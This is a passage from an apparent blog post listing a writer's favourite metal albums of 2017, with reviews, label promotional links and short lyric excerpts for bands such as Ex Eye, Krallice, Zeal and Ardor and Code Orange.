Order on Google Play : http://geni.us/ExEyeGP
Official Links : Ex Eye on Bandcamp : http://exeyeband.bandcamp.com
Ex Eye on Facebook : http://www.facebook.com/ExEye
http://www.relapse.com
http://www.facebook.com/relapserecords
http://www.relapserecords.bandcamp.com
http://www.twitter.com/relapserecords
https://www.instagram.com/relapserecords
Debut album from EX EYE , the instrumental , post - everything quartet led by renowned saxophonist Colin Stetson and featuring the otherworldly drumming of Greg Fox .
EX EYE seamlessly weave between precise , clockwork intricacy and aggressive , ecstatic abandon while taking the listener on a cathartic , thrilling journey to total transcendence .
Recorded live at EX EYE member Shahzad Ismaily 's Figure 8 Studios in Brooklyn , NY ( Blonde Redhead , Damien Rice , Okkervil River , Son Lux , Pussy Riot ) , the self - titled debut showcases a band that is without question the sum of its parts , as each player contributes not only their own particular technical prowess and expertise but also their signature compositional character .
EX EYE make incredibly complex yet beautifully dramatic and emotive music which eclipses usual expectation of style or genre and is sure to be talked about for many years to come .
Saxophone in any non-jazz context has an incredibly high cheese factor potential .
Good when you ’re recording a solo for a Richard Marx single , less good in a “ serious ” album .
In Colin Stetson ’s hands , however , the saxophone becomes the backbone of an incredible instrumental avant - garde metal album .
The interplay between the baritone sax , guitar , electronics , and Greg Fox ’s full body drumming has to be heard to be believed , and is so unique that it does not invite easy comparison .
The album is simultaneously agile and impossibly dense .
The band creates staggering walls of noise , but with a constant motion that propels the listener forward rather than consumes them .
The album is just full of sudden sharp turns .
After listening to dense screeches , the band will put its foot in the ground and instantly pivot , and suddenly you ’re riding this steady groove and do n’t even know when it happened .
It does n’t sound like anything else in the genre .
The CD and digital releases include a 12 minute bonus track which should not be missed ( sorry vinyl buyers ) .
Dvne - Asheran
DVNE " Thirst " Video by Louis Macera , Just - Aurèle Meissonnier and Paul Thomas .
Taken from DVNE 's new album , Asheran .
LP and Digital available for pre-order here : https://songs-of-arrakis.bandcamp.com/album/asheran
Just when it seems like Elder are the clear owners of their niche , a band comes from out of left field to challenge that crown .
Dvne ( ie. “ dune ” , spelled in trve kvlt fashion to sidestep any legal entanglement over the name ) come along with their debut full - length and , quite frankly , outshine Elder , even as Elder releases their arguably best work .
Dvne brings the same progressive stoner metal sensibilities to the table , with equally nimble and frequent lead sequences dancing over the top .
But Dvne ’s style is such that it will take right turns into harsher , sludgier waters than Elder tends to , with death vocals popping in for accentuation here and there ( though not enough that it should turn away anyone whose preferences do n’t include harsh vocals ) .
There ’s a lot of Dune - with - a - U inspired sci- fi in the lyrics ( which form a concept album of sorts , though I ’m not particularly inclined to try and unpack it all ) , but there ’s none of that community - theater - in - music - form that a band like Dream Theater has sunken to .
Instead , you can safely ignore any storyline and simply let the absurd number of killer riffs just wash over you for an hour .
For resolution , our time revolves in dark corners
Through exploration , our time revolves
The unseen path
For resolution
Loss - Horizonless
LOSS - All Grows On Tears ( official audio ) Taken from the album " Horizonless " out May 19 , 2017 .
Pre-order " Horizonless " here : www.profoundlorerecords.com/horizonless www.profoundlorerecords.com www.facebook.com/profoundlorerecords instagram : profoundlorerecords twitter : @profound_lore www.facebook.com/LossDoom All Grows On Tears
When all the stones are thrown Intentions revealed and secrets known
With wounds inflicted and regrets seeds sewn Guilty roots deepen and left alone .
I ’ve sunken to that place again
Where the sun only throws shadows
And the stars have all burned out …
Bury me in a lonely place
And plant thorns on my grave I wonder as to what nourishment those roots must be suckling from that tomb ?
I ’ve sunken to that place again
Where the sun only throws shadows
In shame , bleeding Bleeding ...
Cursed and left a failure
And the stars … the stars have all burned out …
When I leave the trees will shed gold
The winds will stand silent and the sun will go to sleep Unease is important now … .
chewing at me
What if the nightmares wont stop and I have nowhere to go ?
We are only as sick as out secrets
So let the quiet put things where they 're supposed to be
Depressing and heavy .
Those are the only words that seem to fit Loss ’s brand of funeral doom .
Calling it funeral doom might be slightly misleading , as it sounds less like a funeral procession , and more like the inside of a depressed mind as they lay in bed : angered , saddened , lethargic , and too drained to move a muscle in response to any of it .
For such an album , Horizonless is surprisingly melodic .
Guitar lines that you can easily imagine being played at a faster pace by an Iron Maiden - influenced band dote the otherwise desolate aural landscape .
The vocal growls often go so low that they sound like they ’re burrowing under the ground , but a collection of guest vocals also provide tonal contrast .
Junius - Eternal Rituals for the Accretion of Light
JUNIUS - CLEAN THE BEAST ( Official Video ) Order here : http://smarturl.it/Junius17
Junius ’ anthemic post punk / post metal reaches new levels with Eternal Rituals for the Accretion of Light featuring stunning packaging by Drew Speziale ( Circle Takes The Square ) .
Limited edition LPs avilable here .
Prosthetic US Webshop – http://hyperurl.co/9kzq0f
European Webshop - http://hyperurl.co/r7f1bb
" Eternal Rituals for the Accretion of Light .... takes the band 's alternately soaring and crashing sound to even more diverse places . "
- Rolling Stone
I love the absolute crap out of the first half of this album .
I like the rest of it , but the first half has stuck with me since the first day I listened to it .
Junius is what we might call a metal band now , but in their previous two albums , they were much more of an art - rock group .
This album sees the band embrace the heaviest of their material , make it even heavier , and crank up the goth while they ’re at it , to establish a new alternative / goth / post - metal sound that was barely hinted at in their previous work .
The material here stands quite in contrast to most of the rest of this list .
None of the tracks are particularly long , with only the last one breaking 6 minutes .
Many of these songs would be perfectly at home on an alternative rock radio station .
Artists like Tool and Katatonia would be the closest comparisons , both of whom I do like , so perhaps it should not be quite so surprising .
Yet I was still blindsided by just how much this resonated with me .
The Depeche Mode - like vocals over the thick post-metal guitar tones put to alternative metal song structures just works on every level .
my soul is worn
i’ve been here many times before
i need to breach this place
i ’m bound to tempt the fates
i ’m marching ‘ till they know my name
Krallice - Loüm
Rank Mankind Provided to YouTube by CDBaby Rank Mankind · Krallice Loüm ℗ 2017 Krallice Released on : 2017 - 10 - 27 Auto - generated by YouTube .
The first of two albums Krallice released in the last quarter of the year .
Loüm finds the group in collaboration with Dave Edwardson , bassist and ( third ) vocalist for Neurosis .
Here he takes the lead on vocals , synths , and lyrics .
Like any Krallice album , there ’s a ton to absorb here .
The band departed from its atmospheric shoegaze -y black metal on 2015 ’s Ygg Hurr in favor of a more chaotic , kaleidoscopic style , which continued through 2016 ’s Prelapsarian and into this album .
The wildcard on this one is Edwardson , whose presence tethers the sometimes aloof compositions and brings them back down to earth , then kicks them into gear with a hard driving hardcore sensibility - relatively speaking , of course , because this is still Krallice at some of their most technical and spastic .
The genius of Krallice is how they consumed subgenres into a unique style of their own .
Ostensibly identified as a black metal band , based in large part to their early releases , the band has evolved the elements of black metal , and now increasingly death metal , into a sound that cannot in good conscience be labeled as either .
Whereas the chaotic sounds of a band like Pyrrhon still exhibit strongly identifiable markers of death metal , Krallice ’s dialect of these vocabularies have morphed into a language much less easily traced back to its origin .
As lazy as a phrase like “ Krallice sounds like Krallice ” would be , it would also be accurate .
Little man is rank mankind
Common people ’s worthless lives Little man , you ’re useless to me
I hate you , you have no value
Here to serve the likes of me Businesses built on your backs and your toil
Fills the pockets of those with hands too good to touch the soil
Krallice - Go Be Forgotten
Go Be Forgotten Provided to YouTube by CDBaby Go Be Forgotten · Krallice Go Be Forgotten ℗ 2017 Krallice Released on : 2017 - 11 - 20 Auto - generated by YouTube .
If Loüm is Krallice continuing to distance themselves from the kind of atmospheric stylings that the band ’s earlier work was known for , Go Be Forgotten is a reintroduction of those elements into their approach .
Along the way , their Borg - like stylistic assimilation swings around to grab ‘ 70s space - prog and ' 80s synths this time , again morphing and reinventing those elements to make them conformant to the “ Krallice ” sound .
The chaotic , mind - bending attacks are still present here , but rather than dominating the album completely , they give way to atmospherics , and even a drum - less 7 ½ minute ambient space - rock piece 2 /3rds of the way through the album .
This is probably the “ easiest ” Krallice album of the past few years , and should appeal to fans who were turned off by their hard pivot into more aggressive chaos since Ygg Hurr .
Yellow Eyes - Immersion Trench Reverie
Shrillness in the Heated Grass Provided to YouTube by The Orchard Enterprises Shrillness in the Heated Grass · Yellow Eyes Immersion Trench Reverie ℗ 2017 Gilead Media Released on : 2017 - 10 - 20 Auto - generated by YouTube .
I did n’t listen to this until I was almost done making this list , and it quickly wormed its way on .
The two things that come to mind with this album are the use of field recordings , and the absolutely killer black metal riffs that bored their way directly into my core .
Field recordings have always been something I ’ve found neat .
I ’ve been a fan of the Sublime Frequencies label for some time , especially their “ Radio ” series .
I never thought I would hear field recordings featured in a black metal album , but here they ’re used as interstitials to separate the different songs .
But what really defines this album for me is just how many of the angular guitar melodies stuck with me after only a few listens .
There ’s just so many great , memorable , dramatic parts , and the way the compositions bounce back and forth between melodic riffs and straight - up assaults , before giving way to the atmospheric parts layered with those field recordings at the end , is extremely enjoyable .
The day ’s lung held full
shrillness in the heated grass
collapsing on his hunting stool
seed shells like a radiance
the oligarch flanks his tent
salted thistle in his throat
Immolation - Atonement
IMMOLATION - Fostering the Divide ( OFFICIAL LYRIC VIDEO )
Official lyric video for " Fostering the Divide " from IMMOLATION on the upcoming " Atonement " album .
Out now !
Order at http://nuclearblast.com/immolation-atonement
SUBSCRIBE to Immolation YouTube : http://bit.ly/subs-immoltn-yt SUBSCRIBE to Nuclear Blast YouTube : http://bit.ly/subs-nb-yt IMMOLATION " Atonement " is out now on Nuclear Blast Records GET THE ALBUM ' ATONEMENT ' : Nuclear Blast Records : http://nuclearblast.com/immolation-atonement
iTunes : http://nblast.de/ImmolationAtonementIT
Amazon : http://nblast.de/ImmolationAtonementAMP
GooglePlay : http://nblast.de/ImmolationAtonementGP
FOLLOW IMMOLATION : Like : http://facebook.com/immolation
Follow : https://twitter.com/immolation
Watch : http://bit.ly/15Fzamk
There ’s a number of non-tech , non -avant - garde death metal albums that I listened to this year that did n’t really stick with me ( hi , Necrot ! ) .
But one that really did was Immolation ’s Atonement .
The songwriting here really stuck out to me from the first time I listened to the album .
The songs here eschew some of the speed the group explored on recent albums , opting instead for more measured , mid-tempo pacings .
It works , extremely well , as they ’ve got an incredible collection of riffs , and give them the room to breathe and make their impact .
There ’s nothing here that death metal has n’t seen before .
But at a time when a lot of old school death bands seem to be churning out sub - par material and still getting attention for it , Immolation is putting out some of the most expertly crafted work they ’ve ever done .
Call them the Tom Brady of death metal .
isolate us from one another
contempt for the unknown
hatred tears us apart
foster the great divide u nsettling the masses ,
igniting the flames of hate
Boris - Dear
Boris - Absolutego ( Official Video ) Boris " Absolutego " from the album " Dear " , available everywhere now .
Direction & Edit : Fangsanalsatan / Camera : foodunited .
& Non CD / LP
Store : http://boris.hellomerch.com
iTunes : http://smarturl.it/BorisDear_iTunes
Full list of Tour Dates : https://sargenthouse.com/boris
BORIS Website - http://borisheavyrocks.com
Facebook - http://www.facebook.com/borisheavyrocks
Twitter - http://twitter.com/Borisheavyrocks
Instagram - http://www.instagram.com/borisdronevil
Label site - http://sargenthouse.com/boris
Boris ’s “ Pink ” anniversary tour , in which they performed that album in its entirety each night , reignited the group ’s interest in the kind of sludgey doom / psych that has been at the heart of most of the group ’s best releases , turning away from the more drone / ambient work that has comprised much of the band ’s recent work .
At the same time , they also incorporate their more “ indie pop ” songwriting that earned the band crossover attention starting with Pink and a number of following albums .
The highlight as always is guitarist Wata , and the novelty of crushing waves of fuzz and distortion being produced by a tiny 4 - foot - tall *
Japanese woman is one that has never gotten old .
This is far and away the best Boris effort since , well , probably Pink .
(* : an exaggeration , but only very slightly .
Seriously , I walked by her at the Psycho Las Vegas pool this year , and could not believe how short she really is )
Big ‡Brave - Ardor
BIG|BRAVE - Sound OFFICIAL VIDEO BIG|BRAVE 's new album ARDOR out now from Southern Lord Records .
https://southernlord.com/
https://www.facebook.com/SLadmin/ https://twitter.com/TwatterLord https://www.instagram.com/southernlordrecords
https://www.facebook.com/bigbravemusic/
http://www.bigbrave.ca/
Video by Mathieu Ball
Ardor is the second album from Montreal - based drone metal band Big‡Brave .
Though they ’ve toured with Sunn O ) ) ) , their brand of drone metal is n’t nearly so domineering or impenetrable .
Rather , they sound more like a Constellation Records artist ( Godspeed You !
Black Emperor , Silver Mt. Zion ) than a typical drone metal act .
Unsurprising , perhaps , given that that label is ground zero for Montreal - based instrumental - heavy indie bands .
The sound here is rather minimal and even somewhat inviting , as far as drone goes .
Rather than endless drones creating a wall of noise , Big‡Brave uses a lot of space .
Their musical phrases tend to incorporate pauses , both for allowing room to breathe as well as creating some off - kilter stop - and - start sequences .
It makes for a very different take on “ drone ” than artists who hold an endless note for 20 minutes .
The trio ’s drum and dual guitars ( no bass ) are joined by one of those Constellation artists , violinst Jessica Moss ( Thee Silver Mt. Zion Memorial Orchestra ) .
Moss ’s violin sections , both soft and screeching , add a much - needed element to the group ’s sonic mix .
Robin Wattie ’s yelping , piercing vocals , however , are the group ’s defining element ( and most polarizing ) .
Bjork is the most immediate comparison for Wattie ’s strained vocal timbre , and the tightrope they walk between emoting ecstacy and distress .
For me , they are absolutely enchanting , as is the whole band ’s work on this record .
and it ’s not OK
and I do mind
calling you out
every single goddamn time
Best 2017 Albums That Actually Came Out in 2016
Zeal and Ardor - Devil is Fine
ZEAL & ARDOR - Devil is Fine ( Official Video ) Website : http://www.zealandardor.com
Facebook : http://www.facebook.com/zealandardor
LP : http://www.smarturl.it/devilisfineLP
CD : http://www.smarturl.it/devilisfineCD
iTunes : http://apple.co/2lPFODp
Apple Music : http://apple.co/2ll8wfE
Spotify : http://spoti.fi/2lRnJW6
Director : Samuel Morris | http://www.samuelmorris.com
Director of Photography : Fabio Tozzo | http://www.fabiotozzo.com
Producer : Samuel Morris , Fabio Tozzo Co-Producer : Fasnacht & Partner AG | http://www.fasnachtpartner.ch
Executive Producer : Radicalis Music GmbH under exclusive license to MVKA Music Ltd. Performer : Reny Quizeidioco Assistant Director : Christian Taro | http://www.taro.film
Gaffer : Oliver Muff Make Up Artist : Angelina Belintani Concept : Samuel Morris , Manuel Gagneux Key Grip : Raoul Huber Best Boy : Manuel Gagneux Location Rigging : Christian Burgunder , Luca Schürch 3D Animation : http://www.ahoimotion.ch
Color Grading : Fabio Tozzo © 2016 - All rights reserved
Self - released on Bandcamp way back in April 2016 , this was picked up by label MVKA and put into print in early 2017 , which is when I came into contact with it .
This absolutely amazing project crosses slave spirituals with black metal and electronic experimentations .
The result is a wholly unique sounding album that presents itself like twisted gospel sung on a plantation , except instead of praising Jesus , the songs carry more nefarious sensibilities .
This sort of genre crossing could have been horrible .
It could have been so on - the - nose that it was just a charicature of its influences .
Instead , it is so subtlely well done , and a large part of that comes from not being slavishly ( sorry ) faithful to the album ’s core concept .
If this was just a straight run of 9 spiritual - sounding black metal songs , it would not be nearly as effective .
Instead , the definition of “ black metal ” used here is kept loose , and a third of the album are pieces that deconstruct the various elements and recombines them into tracks that resemble sound experiments more so than songs .
These break up the album nicely , and make it more exciting when it swings back to the straightforward tracks .
I do n’t have enough good words for this album .
It is far and away one of the most amazing , effecting products of heavy music in 2017 , even if it ’s technically from 2016 .
he gon ' forgive my sins ( devil is kind )
he promise many things ( devil is fine )
i ca n’t do him no wrong ( devil is kind )
i see him before long ( devil is fine )
Labirinto - Gehenna
Labirinto - Mal Sacré [ OFFICIAL VIDEO ] ( if this video is blocked to you , access : https://youtu.be/-hg5xF5j6SE)
Track : Mal Sacré | Album : Gehenna ( 2016/2017 ) * WORLD pre-order at Pelagic Records ( 2xLP , CD , digital ) https://pelagic-records.com/product/labirinto-gehenna-2xlp-download/
* South America - www.dissensorecords.com
Roteiro e direção / directed by : AMNA
This is another album that was self - released in 2016 , then picked up by a label in 2017 .
In this one ’s case , it was The Ocean ’s label Pelagic Records that re-released it for worldwide distribution in February .
It ’s purely instrumental post-metal , not unlike a darker , more dramatic Russian Circles .
The use of strings builds the atmosphere , with tracks like “ Locrus ” bringing to mind those early Godspeed You !
Black Emperor , releases .
Here , though , these pieces serve to break up the crunchy guitar assault that dominates the rest of the album .
This one is super under the radar .
The group is Brazilian , and I ’ve only seen a couple of English language reviews covering the album .
Being entirely instrumental , there ’s no language barrier to pierce in the music itself , but the fact that the band ’s touring has been limited to their home country and a brief stint through central and eastern Europe ( largely excluding the English - speaking countries ) has done no favors to the group ’s profile in America , the UK , or Scandinavia .
Which is too bad , because this should be the group ’s breakthrough release .
After having put out 8 other releases over their 11 year career ( mostly splits and EPs , only one full - length ) , they went out and got famed sludge / doom producer Billy Anderson to fly out to their Sao Paolo based studio to record this one , and finally gained the attention of a label .
Hopefully at some point they will tour some more and get their name out there .
Honorable Mentions
The Great Old Ones - EOD : A Tale of Dark Legacy
The Great Old Ones - The Ritual Artist : The Great Old Ones / Album : EOD : A Tale Of Dark Legacy Subscribe to Season Of Mist for new releases : https://som.lnk.to/YouTube
Season Of Mist online Shop : http://smarturl.it/SOMeshop Website : http://www.season-of-mist.com/
Facebook : http://facebook.com/seasonofmistofficial
Twitter : http://twitter.com/seasonofmist
Soundcloud : https://soundcloud.com/season-of-mist
Independent in thought , sound and vision .
Label of Saint Vitus , Atheist , Rotting Christ , Kylesa , Morbid Angel , Deströyer 666 , Ghost Brigade , Cynic , Septicflesh , Mayhem , Solstafir and many more !
This one got onto my list early in the year , and just hung around .
This album of atmospheric post - black metal revolves around HP Lovecraft ’s mythology .
The specifics are lost on me , as I have only the most casual of knowledge of Cthulhu , but the themes of an ancient elder god , sunken city , cultist worship , and a looming threat of return are simple enough to follow .
The Great Old Ones endeavor to create the sense of scale and madness in musical form , and the really lay down that atmosphere fantastically .
The intro to “ The Ritual ” is a perfect example , with droning guitar wails over church organ , evoking a twisted cultist ceremony within a dark , dilapidated church .
There are brief spoken - word segments which I could do without , but they ’re brief .
The rest of the time , we ’re treated to great black metal riffing with some surprisingly active drumming .
The biggest letdown is the overall production , which is more stifled and veiled than it should be .
It ’s not album killing , but giving the elements here some room to breathe would have made a difference .
Strange sculptures still stand
Ungodly forms in front of me
The remains of a cult which was banned
The cult of Dagon , lord of the sea
The Shadow over Innsmouth !
Elder - Reflections of a Floating World
Staving off Truth Provided to YouTube by The Orchard Enterprises Staving off Truth · Elder Reflections of a Floating World ℗ 2017 Armageddon Shop Released on : 2017 - 06 -02 Auto - generated by YouTube .
Elder picks up where they left off with 2015 ’s Lore and further refine their spacey stoner / prog metal blend .
As is their established style , Elder lays down a foundation of fuzzy guitar , and then layers a steady dose of nimble , melodic leads over the top , resulting in an album that is both extremely accessible as well as deeply fulfilling , with plenty of surprise and detail to feast on .
Elder brings a greater sonic palette to the table this time around , with two guest musicians joining the trio in studio to add additional guitar and keys to the mix .
Running through the fields
Down the ones you think you need
Throwing off the chains , cursing years in vain
Living in a myth , the boundaries of which lie in decay
The body seeks to convalesce
The earth we deem it ’s own redress
Altarage - Endinghent
Altarage - Spearheaderon ( official music video ) Subscribe to Season Of Mist for new releases : https://som.lnk.to/YouTube
Taken from the forthcoming album " Endinghent " .
Release Date : Oct 13th , 2017 .
Order here : http://smarturl.it/AltarageEndinghent
Follow Altarage : https://www.facebook.com/ALTARAGE/
Follow Season Of Mist : http://www.season-of-mist.com
http://www.facebook.com/seasonofmistofficial
http://www.youtube.com/user/SeasonOfMistLabel
https://www.instagram.com/seasonofmistofficial/
Altarage hails from Spain and plays thick , noisy blackened death metal .
Comparisons to Portal are often made , and are pretty accurate .
The guitars create a mucky , compressed wall of noise , as they alternate between tremolo - picked freakouts and heavy death riffs .
Vocals are growled from further back in the mix , usually just holding one or two words at a time , as these songs seem to have about 10 words in them on average .
The oppressive atmosphere is well established ( with sickening , tar - like guitar tones ) , but much like the Immolation and Yellow Eyes albums listed above , this one earned an extra amount of time in my rotation thanks to a number of songs that stuck with me .
The driving blast - beat sections give way to some excellent death metal riffing that crawls out of that tar and makes itself heard .
( As I ’ve said , these are men of few words .
The words below are the entirety of the lyrics to the 6 - minute opening song , “ Incessant Magma ” .
Pretty much every song is like this . )
Barrier down
Propheteer
Fundations of time
Magma
Surface
Deconstruct
Pillar Rust
Planning for Burial - Below the House
Planning For Burial - Dull Knife pt. I Order : http://theflenser.bandcamp.com
http://nowflensing.com
Artist : Planning For Burial Track : Dull Knife Pt. 1 Release : Below the House Label : The Flenser
Below the House is a doomgaze album that very much evokes the kind of snow - blanketed scenes depicted on the album ’s cover .
It alternates between shoegaze drone like Jesu ( circa Conqueror ) , as well as the icy slowcore of a band like Low - but all coming from more of a doom metal -y perspective .
Vocals alternate between blackened wails and shoegazey indie rock dude singing .
The alternation between the harsher pieces and the slowcore keeps the noise from being overwhelming .
Rather , it ’s very much a melancholy affair .
It may be arguable just how “ metal ” this is , but on the whole , I ’m going to keep it in the “ doomgaze ” category , which is metal enough to count .
This is the place I live
but it ’s not my home
this is the place I live
my roots do n’t grow
Luminous Vault - Charismata
Birthblood Provided to YouTube by The Orchard Enterprises Birthblood · Luminous Vault Charismata ℗ 2017 Profound Lore Released on : 2017 - 03 - 13 Auto - generated by YouTube .
This one slid under a lot of radars .
A duo featuring modern classical composer Mario Diaz de Leon and the bassist from Artificial Brain , Samuel Smith , this EP is the group ’s first “ major ” label debut ( Profound Lore ) , having self - released another EP a couple of years ago .
Not even sure how I stumbled on this other than it being on Profound Lore , as there are precious few reviews of it that come up in a Google search .
On top of the Godflesh - inspired programmed drums belting out industrial thwak -s , de Leon and Smith grind out some great black and death metal riffs .
Usnea - Portals into Futility
USNEA - " Pyrrhic Victory " ( Official Music Video ) ' Portals Into Futility ' Out Now on CD / 2xLP / Digital Order via Relapse Records Here : http://bit.ly/UsneaPIF
Subscribe to Relapse Records Channel : http://bit.ly/RelapseYouTube
Directed by Maximum Volume Silence Live Video Credit : Billy Goate / Doomed & Stoned Order on Bandcamp : http://usneadoom.bandcamp.com
Order on iTunes : http://geni.us/UsneaiT
Order on Amazon : http://geni.us/UsneaAMZ
Order on Google Play : http://geni.us/UsneaGP
Portland doom quartet USNEA return with their third full - length , Portals Into Futility .
Inspired by dystopian science - fiction and the painful intersection of today 's crushing reality , Portals Into Futility is 5 songs and 56 minutes of expertly crafted and elegantly depressive doom / sludge .
With an evolved sound of strength and dynamism , USNEA delve more into the worlds of dissonant death metal , varied vocal structures and cinematic composition , all while maintaining the monumental heaviness , brutality , discord , anger , and mournful melodicism of their previous work .
Across dark and brooding peaks and valleys , USNEA remind us that no matter how many doors are opened to the human species , our self - aggrandizement and hubris all lead to futility .
Official Links : Usnea on Facebook : https://www.facebook.com/usneadoom
Usnea on Instagram : https://www.instagram.com/usneadoom/
http://www.relapse.com
http://www.facebook.com/relapserecords
http://www.relapserecords.bandcamp.com
http://www.twitter.com/relapserecords
https://www.instagram.com/relapserecords
Usnea is one of the many Portland - based doom metal bands to garner attention in recent years .
I enjoyed their second album , 2014 ’s Random Cosmic Violence , as well as their live set at Psycho Las Vegas this year .
On this album , the lyrics are inspired by ( largely dystopian ) sci- fi novels , of which the band provides a reading list : Gene Wolfe , Ursula Le Guin , Carl Sagan , Margaret Atwood , Philip K. Dick , and Frank Herbert .
It ’s a nice change in theme from the usual trappings of the genre .
The group ’s sound has matured somewhat as well , as the group has embraced more death metal elements and varied vocal stylings , giving them a bit more range within which to work .
The biggest downside is that it runs out of steam a bit in the final 20 - minute long track .
And despite a positive evolution of sound , it did n’t land quite as squarely for me as Random Cosmic Violence .
That said , still a solid effort worth attention .
Impetuous Ritual - Blight Upon Martyred Sentience
Intransience Provided to YouTube by The Orchard Enterprises Intransience · Impetuous Ritual Blight Upon Martyred Sentience ℗ 2017 Profound Lore Released on : 2017 - 06 - 16 Auto - generated by YouTube .
This album begins with the creation of a aural whirling abyss by the guitars .
It ’s this all - encompassing rumble , sounding like what you might imagine a black hole to resemble - a fixed point in space of power and unfeeling consumption .
It ’s recognizable as guitar tones , but individual notes and chord strikes become imperceptibly blended together in this persistent , unflinching roar .
The first 7 and ¾ minute track is simply the establishment of this abyss , which essentially remains in place throughout the rest of the album , sitting there , whirling and roaring .
Once the second track starts , the death metal kicks in , and these elements simply dance around the abyssal roar .
Vocal growls and wailing guitar leads leap out to be heard , flashing for brief moments until falling into the abyss themselves .
Converge - The Dusk in Us
Converge - " A Single Tear " Listen to the full album : http://bit.ly/2ypxqC7
" A Single Tear " by Converge from the album ' The Dusk In Us , ' available now Order at http://www.convergecult.com
Directed by Max Moore http://www.maxmoorefilms.com/
Official Site : http://www.convergecult.com/
Facebook : https://www.facebook.com/converge
Twitter : https://twitter.com/Convergecult Instagram : https://www.instagram.com/converge
I have such a conflicted opinion of Converge .
There ’s no question you ’re listening to masterful musicians , but the metalcore style and , frankly , some of the lyrical expressions both veer into “ misunderstood 17 - year - old at Hot Topic ” territory .
Converge albums deceptively hide their brilliant bits under the surface , so what is always an underwhelming listen at first exposes itself more over time .
Kurt Ballou ’s guitar work is glorious , as is his production of the album ( and everything else he produces ) .
Some of these songs really get under your skin and worm their way past your mental barriers , even when the words sound more like an angsty high schooler ’s poetry .
( The “ cannibals ! ” scream will never not be cringey , though .
The one part of the album that I simply cannot get past . )
They ’re also one of those bands where your opinion of them changes ( in a positive way ) after watching them live .
Seeing their live show should n’t make the albums sound any differently , but it does .
Seeing them at Psycho Las Vegas definitely improved my listening of their previous album , All We Love We Left Behind , and since I am seeing them again in a couple weeks , I do n’t doubt that my opinion of The Dusk in Us is going to get a bump .
As a single teardrop fell
And was swallowed by the sea
You outshined the best there was
Rewrote who I could be
When I held you for the first time
I knew I had to survive
Code Orange - Forever
Code Orange - The Mud [ OFFICIAL VIDEO ]
Code Orange 's music video for " The Mud " from the album , Forever - available now on Roadrunner Records : http://codeorangetoth.com
Roadrunner Records Store : http://smarturl.it/codeorangestore
All In Merch : http://allinmerch.com/code-orange
iTunes : http://flyt.it/forever
Amazon : http://flyt.it/forever-amz
Google : http://flyt.it/forever-gp
Site : http://codeorangetoth.com
iTunes : http://flyt.it/forever
Facebook : https://facebook.com/codeorangetoth
Twitter : https://twitter.com/codeorangetoth
Instagram : http://instagram.com/codeorangetoth
Subscribe : https://bit.ly/2FkhYKA
Heavy Blog really teed off on this album in their annual Music Jouralism ’s Top 25 list , calling it “ one of the most overrated metal albums of the year ” , and “ nothing more than tough guy metalcore that barely strays into any truly experimental territory . ”
I think that ’s too harsh .
The overrated bit might be true , based on just how high that rating is .
They ’re right that seemingly every publication has pegged this as one of the top albums of the year , and some have been absolutely effusive with their praise .
But as someone whose take on metalcore is such that I ’m permanently stuck in the “ bargaining ” phase of even embracing a band like Converge ( “ they ’re not really metalcore … right ? … Right ? ” ) , this album did not strike me as “ tough guy metalcore ” , but a more varied album that wove in and out of different subgenres , and never seemed to settle into any one style .
“ The Mud ” is a good example , as it moves between metalcore and alternative metal to start , then an ambient interlude acts as a bridge with a largely instrumental second half that firmly channels Meshuggah .
The album pulls in different influences from song to song , and the rotation of vocalists between the different tracks ensures that the next song does n’t sound like the one you just listened to .
Like with Converge , there ’s some cringe to some of the lyrics here ( “ This is real now , motherfucker ! ” is the “ cannibals ! ” of this record ) .
Originality might not be the album ’s strongest suit , as it unabashedly pulls from influences that all congregate in that late ‘ 90s / early '00s time frame .
And it definitely is overrated by the mainstream metal press .
But it ’s good .
You wanna see it through my eyes ?
You do n’t
You ca n’t feel it from the inside
You had the chance .
You wo n’t
Goya - Harvester of Bongloads
Misanthropy on High Provided to YouTube by TuneCore Misanthropy on High · Goya Harvester of Bongloads ℗ 2017 Opoponax Records Released on : 2017 - 03-03 Auto - generated by YouTube .
Goya ’s subdomain for their URLs on both the merch site BigCartel and music selling site Bandcamp is simply “ marijuana ” .
Stoner metal bands as a rule wear their love of reefer on their sleeve , and while Goya might not be among the many with “ bong ” in their name , they ’ve finally worked it into an album title , and with a Metallica reference to boot .
Goya has been prolific of late , and each new release has been an improvement to their formula .
Bongloads keeps the pattern , easily being their new best .
It ’s thick , fuzzy stoner / doom that keeps a foot rooted strongly in psych rock .
misanthropy on high - a- day
no different from any other day
i sit and light the bong
i smoke this world away
i just sit here and waste away
Participation Ribbon
These are albums that are n’t necessarily on my “ Best of ” list , but that I wanted to talk about for some reason .
Power Trip - Nightmare Logic
POWER TRIP - " Executioner 's Tax ( Swing of The Axe ) " ( OFFICIAL VIDEO ) " Executioner 's Tax ( Swing of The Axe ) " comes off the brand new Power Trip album " Nightmare Logic . "
With hooks and tightness rivaling greats like Pantera or Pentagram and production by the esteemed Arthur Rizk , " Nightmare Logic " punishes fans not only sonically but with pure songwriting skill .
The sophomore release and second on Southern Lord Records , raises the bar and pushes Power Trip to new extremes .
" Executioner 's Tax ( Swing of The Axe ) " ( OFFICIAL VIDEO ) Director : Andy Capper Director of Photography : Joel Pront Editor : Andrew Betsch Order " Nightmare Logic " Here : http://southernlord.com/band/power-trip
http://southernlordeurope.com
http://powertripsl.bandcamp.com
https://itunes.apple.com/us/album/nightmare-logic/id1172529658
" Executioner 's Tax ( Swing of The Axe ) " Go on and look at you , Today is your lucky day
The executioner ’s here , and he ’s ready to make you pay
You prayed for so long , and now you have your chance
The executioner ’s here , and he ’s sharpening his axe Swing of the Axe Cry all you want , but the blade soars today Swing of the Axe You buy in the for the privilege , to know what lies beyond Death hides behind veiled faces
It only takes one swing , and you ’re gone
The executioner , The beginning and the end He carries cold hard steel masked with the taste of medicine Blessed with a reaper ’s touch , his might cannot be matched
It ’s time to pay the man , The Executioner ’s Tax Swing of the Axe Swing at the World Even a killer has to get paid Swing of the Axe
OK , so I ’m not the biggest thrash fan .
But I enjoyed this album when it came out , and listened to it quite a bit .
I had it penciled in for nothing less than an Honorable Mention all year .
But then , when I got around to finalizing the list , and listening to everything one last time …
I found I just did n’t have a lot of desire to listen to this anymore .
It was fun back in February , particularly as I was doing a lot of long drives up and down California for work , and it suited my mood for Highway 101 traffic .
But even having not listened to it for months , coming back to it , I found I remembered it all too well , as if I had listened to it all week long already .
There was n’t anything new to discover in revisiting it , just anthemic shouts that I felt like I was already tired of .
I realize that ’s basically criticizing the music for being exactly what it sets out to be , but I feel like I should n’t be this burnt out on it already .
That guitar tone is badass though .
I ca n’t argue with that .
Last generation , an aberration
watching the whole world burn
we have no mouths and we must scream
the void welcomes us again
Pallbearer - Heartless
